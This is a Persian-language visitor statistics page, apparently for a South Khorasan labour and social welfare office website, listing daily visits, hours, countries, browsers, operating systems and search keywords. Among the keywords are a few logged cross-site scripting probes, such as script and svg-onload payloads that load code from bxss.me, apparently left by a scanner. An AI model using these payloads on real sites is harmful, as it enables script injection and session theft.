تعداد بازدیدکنندگان

۶ نفر
۳۶,۲۳۶,۷۶۳ نفر
۲۲,۴۴۸ نفر
۳۳,۶۹۴ نفر
۱۴ مهر ۱۳۹۴
۵۵,۳۱۵ نفر
تاریختعداد کاربرانتعداد صفحات مشاهده شده
۰۸/۲۳ ۴۳   کاربر ۹۸   صفحه
۰۸/۲۲ ۹۰   کاربر ۱۷۶   صفحه
۰۸/۲۱ ۹۱   کاربر ۲۰۱   صفحه
۰۸/۲۰ ۸۰   کاربر ۱۸۴   صفحه
۰۸/۱۹ ۱۸۶   کاربر ۲۹۹   صفحه
۰۸/۱۸ ۴۲   کاربر ۷۶   صفحه
۰۸/۱۷ ۳۳   کاربر ۴۶   صفحه
۰۸/۱۶ ۳۰   کاربر ۵۴   صفحه
۰۸/۱۵ ۸۸   کاربر ۲۰۱   صفحه
۰۸/۱۴ ۹۹   کاربر ۲۹۱   صفحه
۰۸/۱۳ ۱۱۰   کاربر ۲۲۵   صفحه
۰۸/۱۲ ۱۰۲   کاربر ۲۸۸   صفحه
۰۸/۱۱ ۳۸   کاربر ۷۸   صفحه
۰۸/۱۰ ۱۱۲   کاربر ۲۳۰   صفحه
۰۸/۰۹ ۱۱۶   کاربر ۲۲۷   صفحه
۰۸/۰۸ ۴۷   کاربر ۷۲   صفحه
۰۸/۰۷ ۹۳   کاربر ۱۸۷   صفحه
۰۸/۰۶ ۷۹   کاربر ۲۳۱   صفحه
۰۸/۰۵ ۱۱۰   کاربر ۲۳۴   صفحه
۰۸/۰۴ ۲۸   کاربر ۶۵   صفحه
۰۸/۰۳ ۸۰   کاربر ۱۷۶   صفحه
۰۸/۰۲ ۹۶   کاربر ۱۸۵   صفحه
۰۸/۰۱ ۹۹   کاربر ۲۱۵   صفحه
۰۷/۳۰ ۸۱   کاربر ۲۸۴   صفحه
۰۷/۲۹ ۱۰۶   کاربر ۳۳۴   صفحه
۰۷/۲۸ ۹۲   کاربر ۳۳۷   صفحه
۰۷/۲۷ ۶۹   کاربر ۳۲۴   صفحه
۰۷/۲۶ ۹۲   کاربر ۲۸۰   صفحه
۰۷/۲۵ ۱۰۰   کاربر ۳۶۱   صفحه
۰۷/۲۴ ۹۷   کاربر ۳۵۶   صفحه
ساعتتعداد بازدیددرصد بازدید

ساعت ۰ تا ۱
۹۴,۷۶۷ ۵ %

ساعت ۱ تا ۲
۱۰۷,۳۴۶ ۵ %

ساعت ۲ تا ۳
۱۰۴,۹۶۵ ۵ %

ساعت ۳ تا ۴
۹۳,۱۸۷ ۵ %

ساعت ۴ تا ۵
۸۴,۳۵۹ ۴ %

ساعت ۵ تا ۶
۷۴,۶۶۱ ۴ %

ساعت ۶ تا ۷
۶۸,۸۲۶ ۳ %

ساعت ۷ تا ۸
۷۵,۷۸۵ ۴ %

ساعت ۸ تا ۹
۸۸,۹۹۲ ۴ %

ساعت ۹ تا ۱۰
۸۴,۶۴۹ ۴ %

ساعت ۱۰ تا ۱۱
۸۷,۴۵۶ ۴ %

ساعت ۱۱ تا ۱۲
۸۱,۳۳۴ ۴ %

ساعت ۱۲ تا ۱۳
۹۳,۷۴۰ ۵ %

ساعت ۱۳ تا ۱۴
۱۰۱,۸۴۹ ۵ %

ساعت ۱۴ تا ۱۵
۱۰۹,۹۸۹ ۵ %

ساعت ۱۵ تا ۱۶
۹۶,۴۰۸ ۵ %

ساعت ۱۶ تا ۱۷
۹۵,۱۴۲ ۵ %

ساعت ۱۷ تا ۱۸
۸۳,۷۴۶ ۴ %

ساعت ۱۸ تا ۱۹
۷۷,۸۱۹ ۴ %

ساعت ۱۹ تا ۲۰
۶۶,۰۹۴ ۳ %

ساعت ۲۰ تا ۲۱
۵۷,۵۳۲ ۳ %

ساعت ۲۱ تا ۲۲
۶۳,۸۱۵ ۳ %

ساعت ۲۲ تا ۲۳
۶۷,۵۰۵ ۳ %

ساعت ۲۳ تا ۲۴
۶۴,۴۸۸ ۳ %
نام کشورتعداد بازدیددرصد بازدید
IRN
IRN
۲۰,۸۷۴,۶۸۰ ۵۸ %
ZZZ
ZZZ
۷,۲۷۸,۲۶۹ ۲۰ %
USA
USA
۱,۷۵۷,۹۸۴ ۵ %

۱,۶۳۲,۷۵۹ ۵ %
EU
EU
۱,۵۹۰,۹۵۹ ۴ %
DEU
DEU
۸۱۳,۳۲۶ ۲ %
GBR
GBR
۴۱۱,۰۷۹ ۱ %
RUS
RUS
۳۶۳,۸۹۸ ۱ %
ROM
ROM
۳۲۳,۴۲۵ ۱ %
FRA
FRA
۱۷۷,۶۷۶ ۰ %
CHN
CHN
۱۰۰,۲۸۵ ۰ %
ITA
ITA
۸۲,۱۴۱ ۰ %
TUR
TUR
۶۴,۹۵۹ ۰ %
NOR
NOR
۶۲,۷۳۱ ۰ %
POL
POL
۴۹,۸۸۹ ۰ %
DNK
DNK
۴۷,۴۹۶ ۰ %
CAN
CAN
۴۳,۷۰۴ ۰ %
FIN
FIN
۴۳,۲۹۰ ۰ %
UKR
UKR
۳۸,۷۳۹ ۰ %
AUS
AUS
۳۵,۹۱۲ ۰ %
نام مرورگرتعداد بازدیددرصد بازدید
Firefox
Firefox
۴۳,۶۷۹ ۴۱ %
Chrome
Chrome
۳۴,۳۰۶ ۳۲ %
Mozilla
Mozilla
۷,۴۹۹ ۷ %
IE 9.0
IE 9.0
۴,۴۶۱ ۴ %
IE 8.0
IE 8.0
۳,۸۹۹ ۴ %
Other
Other
۳,۶۶۳ ۳ %
IE 6.0
IE 6.0
۲,۶۳۷ ۲ %
IE 11.0
IE 11.0
۲,۴۸۴ ۲ %
IE 7.0
IE 7.0
۱,۵۷۴ ۱ %
Safari
Safari
۱,۳۱۵ ۱ %
Opera
Opera
۶۶۸ ۱ %
IE 10.0
IE 10.0
۵۸۹ ۱ %
Edge
Edge
۱۶۵ ۰ %
سیستم عاملتعداد بازدیددرصد بازدید
XP ۳۴,۰۸۶ ۳۳ %
Windows 7 ۳۳,۶۰۶ ۳۲ %
Other ۱۲,۰۰۷ ۱۱ %
Linux ۱۰,۸۲۶ ۱۰ %
Windows 2003 ۶,۰۵۴ ۶ %
Windows 10 ۳,۳۸۰ ۳ %
Windows 8 ۲,۱۹۵ ۲ %
iOS ۱,۰۶۹ ۱ %
Android ۸۰۸ ۱ %
Vista ۸۰۳ ۱ %
FreeBSD ۳ ۰ %
WebOS ۰ ۰ %
Windows Mobile ۰ ۰ %
کلمات جستجو شده 
testing ۳۰,۵۷۷
اداره کار بیرجند ۳۹۶
اداره کل تعاون کار و رفاه اجتماعی خراسان جنوبی ۲۸۱
اداره کل تعاون خراسان جنوبی ۲۶۹
اداره کل تعاون،کارورفاه اجتماعی استان خراسان جنوبی ۱۹۳
اداره کار خراسان جنوبی ۱۶۷
اداره کل تعاون کار خراسان جنوبی ۱۵۴
اداره کل تعاون کار ورفاه اجتماعی خراسان جنوبی ۱۵۰
older news google.com/url?sa=?q=how to ۱۳۷
اداره کل تعاون کارورفاه اجتماعی خراسان جنوبی ۱۱۶
اداره تعاون خراسان جنوبی ۱۰۵
اداره کل کار خراسان جنوبی ۱۰۲
اداره کل تعاون جنوبی ۱۰۰
اداره کل تعاون،کارورفاه اجتماعی خراسان جنوبی ۸۴
testing''"() ۷۸
نمونه قرارداد ۷۳
testing<svg/onload='' /"/ /onmouseover=1/ (s=document.createElement(/script/.source),s.src=(/,/ /bxss.me\/s?u=048877 ۷۳
testing''>"><script src=http://bxss.me/s?u=048877 ۷۳
اداره تعاون بیرجند ۶۳
بیمه بیکاری ۵۹
اداره کل تعاون بیرجند ۴۹
آموزش گلخانه داری ۴۵
اداره کل تعاون کار و رفاه خراسان جنوبی ۴۵
ایمنی ۴۵
تعاون خراسان جنوبی ۴۴
سنوات ۴۲
www.skh.mcls.gov.ir ۳۸
اداره کاربیرجند ۳۸
ادارهکل تعاون کار خراسان جنوبی ۳۷
مشاغل خانگی ۳۷
حق سنوات ۳۷
اداره کل تعاون کار ورفاه خراسان جنوبی ۳۳
صندوق بیمه روستائیان وعشایر ۳۲
yaraneh10.ir ۳۲
سایت اداره کل تعاون کار خراسان جنوبی ۳۱
اداره کار استان خراسان جنوبی ۲۹
اعتراض به حذف یارانه ۲۹
اساسنامه ۲۷
قاین ۲۷
اولویت های پژوهشی ۲۷
فرم ۲۷
عکس بازدیدمعاون وزیر کار ۲۷
www.skh.mcls.gov.ir/fa/home ۲۶
کار ۲۵
اداره کل کار و امور اجتماعی خراسان جنوبی ۲۴
ادارات خراسان جنوبی ۲۴
تعاونی های آموزشگاهی ۲۳
www.kn93.mcls.gov.ir ۲۳
اداره کل تعاون استان خراسان جنوبی ۲۲
سایت اداره کار بیرجند ۲۲